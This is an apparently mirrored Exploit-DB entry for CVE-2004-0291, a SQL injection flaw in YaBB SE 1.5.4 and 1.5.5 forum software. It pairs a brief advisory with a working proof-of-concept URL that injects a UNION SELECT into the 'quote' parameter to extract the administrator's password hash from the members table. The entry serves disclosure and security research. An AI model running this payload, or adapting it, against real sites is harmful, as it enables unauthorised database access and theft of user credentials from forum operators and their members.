- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23710
- Проверка EDB
-
- Пройдено
- Автор
- BACKSPACE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2004-0291
- Дата публикации
- 2004-02-16
Код:
source: https://www.securityfocus.com/bid/9674/info
It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software.
YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.
http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
l,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*- Источник
- www.exploit-db.com
